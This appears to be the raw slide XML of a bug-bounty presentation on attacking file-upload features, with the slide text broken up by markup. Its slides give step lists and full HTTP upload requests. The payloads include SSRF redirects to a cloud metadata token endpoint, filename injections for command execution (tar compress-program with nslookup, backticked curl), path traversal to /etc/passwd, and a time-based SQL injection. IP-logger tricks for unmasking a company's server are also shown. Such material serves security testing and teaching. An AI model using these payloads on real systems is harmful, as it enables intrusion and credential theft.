              <a:t> OR Not To Get SSRF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862" name="Google Shape;862;p91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Steps to produce :-</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Put Your Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. https://me.com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2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Your domain Will Response With Only A Little Bytes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3 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Server Will Ask About The Rest Of The File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4 -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D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your domain Will Response With Redirect To Internal  </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Server e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://metadata.google.internal/computeMetadata/</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        v1beta1/instance/service-accounts/default/token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863" name="Google Shape;863;p91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64" name="Google Shape;864;p91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91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866" name="Google Shape;866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7" name="Google Shape;867;p91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868" name="Google Shape;868;p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350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92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If There Is Option To Upload From Your Domain , Try To Add Address Of This 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https://iplogger.org</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get Real IP Address Of The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Company</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1" sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="874" name="Google Shape;874;p92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Steps to produce :-</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Browse To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00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https://iplogger.org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2 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Click On </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invisible</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Image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3 -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Copy Your IPLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> link</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 -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D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Append </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your IPLogger link</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> As URL Of The Image</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 - Click On </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logged IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reload</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get The IPs</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     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875" name="Google Shape;875;p92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76" name="Google Shape;876;p92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92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878" name="Google Shape;878;p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9" name="Google Shape;879;p92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880" name="Google Shape;880;p9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8350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93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Upload Image From </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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exif-org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Then Put Path Of Uploaded Image In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0B539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http://exif.regex.info/exif.cgi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And Read The Output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886" name="Google Shape;886;p93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Steps to produce :-</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 -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Download Image Frome </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00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https://github.com/ianare/exif-samples</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00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</a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00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	/tree/master/jpg/exif-org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2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Upload It To Your Target</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Put Oath Of Uploaded Image In</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://exif.regex.info/exif.cgi</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D9D9D9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     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887" name="Google Shape;887;p93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88" name="Google Shape;888;p93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93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890" name="Google Shape;890;p9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1" name="Google Shape;891;p93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892" name="Google Shape;892;p9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8350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94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After Uploading File </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To search In Burp Suite About Token</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , Because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Sometimes The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Will </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send Access Token To Third Party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898" name="Google Shape;898;p94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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /getInformation HTTP/1.1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Host: third-party.com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Access_Token: ************************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899" name="Google Shape;899;p94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00" name="Google Shape;900;p94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94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902" name="Google Shape;902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3" name="Google Shape;903;p94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904" name="Google Shape;904;p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350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9" name="Google Shape;909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74724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="910" name="Google Shape;910;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58375" y="4711825"/>
            <a:ext cx="9016200" cy="4629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B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  Hack3rScr0lls</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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                              </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="17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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#BugBountyTip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911" name="Google Shape;911;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3063350" y="4711813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0B539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0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="912" name="Google Shape;912;p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0925" y="4760737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96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524900" y="132782"/>
            <a:ext cx="195600" cy="206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96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639550" y="339175"/>
            <a:ext cx="441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675">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Thank You</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="9600">
              <a:solidFill>
                <a:srgbClr val="0B5394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19" name="Google Shape;919;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324350" y="2864775"/>
            <a:ext cx="50301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b="1" lang="en">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="36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Mahmoud M.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="36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Awali</a:t>
            </a:r>
            <a:b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     </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Arial Black"/>
                <a:ea typeface="Arial Black"/>
                <a:cs typeface="Arial Black"/>
                <a:sym typeface="Arial Black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@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1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920" name="Google Shape;920;p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450" y="4049201"/>
            <a:ext cx="727375" cy="564475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="921" name="Google Shape;921;p96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6032650" y="0"/>
            <a:ext cx="7983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96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7189175" y="0"/>
            <a:ext cx="7983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96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8345700" y="0"/>
            <a:ext cx="7983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5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Put File Name e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-­‐use­‐compress‐program=nslookup me.com ‐domain=a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.extension</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> To Get RCE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264" name="Google Shape;264;p45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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-­‐use-­compress‐program=nslookup me.com -­domain=a.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Google Shape;265;p45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66" name="Google Shape;266;p45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45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68" name="Google Shape;26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45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70" name="Google Shape;270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600" y="2621200"/>
            <a:ext cx="489850" cy="46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6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Put File Name As LFI Payloads  e.g. image.png../../../../../../../etc/passwd </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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To Get LFI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276" name="Google Shape;276;p46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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image.png../../../../../../../etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;p46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78" name="Google Shape;278;p46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6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80" name="Google Shape;28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46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82" name="Google Shape;282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762" y="2455550"/>
            <a:ext cx="1323825" cy="69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7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Put File Name As Time-Based SQLi Payloads  e.g. poc.js'(select*from(select(sleep(20)))a)+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'.extension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To Get SQLi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288" name="Google Shape;288;p47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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poc.js'(select*from(select(sleep(20)))a)+'.png</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>image/png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------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p47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90" name="Google Shape;290;p47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47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92" name="Google Shape;29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47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94" name="Google Shape;294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025" y="2675525"/>
            <a:ext cx="4210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8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Inject OS Command</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. `curl me.com` In Content Of The File Name </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394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To Get RCE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300" name="Google Shape;300;p48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/fileUpload HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: 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Content-Type: multipart/form-data; boundary=----WebKitFormBoundary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Content-Length: Number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Content-Disposition: form-data; name="file"; filename="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`curl me.com`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---------------------------------------WebKitFormBoundary--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p48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02" name="Google Shape;302;p48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8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304" name="Google Shape;30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8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06" name="Google Shape;306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350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